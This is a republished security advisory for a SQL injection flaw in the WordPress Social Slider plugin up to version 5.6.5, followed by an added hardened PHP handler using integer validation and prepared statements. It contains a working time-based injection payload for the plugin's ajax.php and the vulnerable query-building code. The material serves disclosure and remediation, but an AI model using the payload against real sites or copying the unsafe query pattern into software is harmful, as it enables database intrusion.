Social Slider <= 5.6.5 SQL Injection Vulnerability and Fix - Website Security

Source: 自学PHP网    Date: 2015-04-17 14:46

# Exploit Title: Social Slider <= 5.6.5 SQL Injection Vulnerability
# Date: 2011-08-05
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/social-slider-2.zip
# Version: 5.6.5 (tested)
 
---------------
PoC (POST data)
---------------
http://www.2cto.com /wp-content/plugins/social-slider-2/ajax.php
 action=ZapiszPozycje&rA[]=1 AND SLEEP(5)
 
---------------
Vulnerable code
---------------
<?php
require_once(dirname(__FILE__).'/../../../wp-config.php');
global $wpdb, $table_prefix;
 
$SocialSliderArray = $_POST['rA'];
 
if (mysql_real_escape_string($_POST['action']) == "ZapiszPozycje")
    {
    $lC = 1;
    foreach ($SocialSliderArray as $recordIDValue)
        {
        $query = "UPDATE ".$table_prefix."socialslider SET lp = ".$lC." WHERE id = ".$recordIDValue;
        mysql_query($query);
        $lC = $lC + 1;  
        }
    }
?>
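
A hardened form of the handler above, as an added example that is not part of the original advisory or the plugin's own code: each rA[] element is validated as an integer id and the UPDATE runs as a prepared statement. The helper names parse_record_ids() and save_positions() are hypothetical, and PDO with an in-memory SQLite table stands in for the WordPress database so the script runs offline; inside WordPress the same statement would be built with $wpdb->prepare() and %d placeholders.

```php
<?php
// Added example. Assumptions: PDO + in-memory SQLite replace the WordPress
// database, and the table name wp_socialslider uses the default "wp_" prefix.

/** Hypothetical helper: return rA[] as a list of ints, or null if any element is malformed. */
function parse_record_ids($raw): ?array
{
    if (!is_array($raw)) {
        return null;
    }
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit() rejects "1 AND SLEEP(5)", "-1", "1.0", "" and nested arrays.
        if (!is_string($value) || !ctype_digit($value)) {
            return null;
        }
        $ids[] = (int) $value;
    }
    return $ids;
}

/** Hypothetical helper: store the new ordering; returns the number of rows updated. */
function save_positions(PDO $db, string $table, array $ids): int
{
    // $table comes from the configured prefix only, never from request data.
    $stmt = $db->prepare("UPDATE {$table} SET lp = :lp WHERE id = :id");
    $updated = 0;
    foreach ($ids as $position => $id) {
        $stmt->bindValue(':lp', $position + 1, PDO::PARAM_INT);
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        $updated += $stmt->rowCount();
    }
    return $updated;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wp_socialslider (id INTEGER PRIMARY KEY, lp INTEGER)');
$db->exec('INSERT INTO wp_socialslider (id, lp) VALUES (1, 1), (2, 2), (3, 3)');

// Constructed request bodies: a legitimate reorder, then the rA[] value from the PoC above.
foreach ([['3', '1', '2'], ['1 AND SLEEP(5)']] as $rA) {
    $ids = parse_record_ids($rA);
    if ($ids === null) {
        echo "rejected: rA[] must contain only integer ids\n";
        continue;
    }
    echo save_positions($db, 'wp_socialslider', $ids), " rows updated\n";
}
```

Validation and parameter binding are both applied on purpose: the integer check rejects the request early and gives a clean place to log it, while the bound parameters keep the value out of the SQL text even if the check is later loosened.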
 
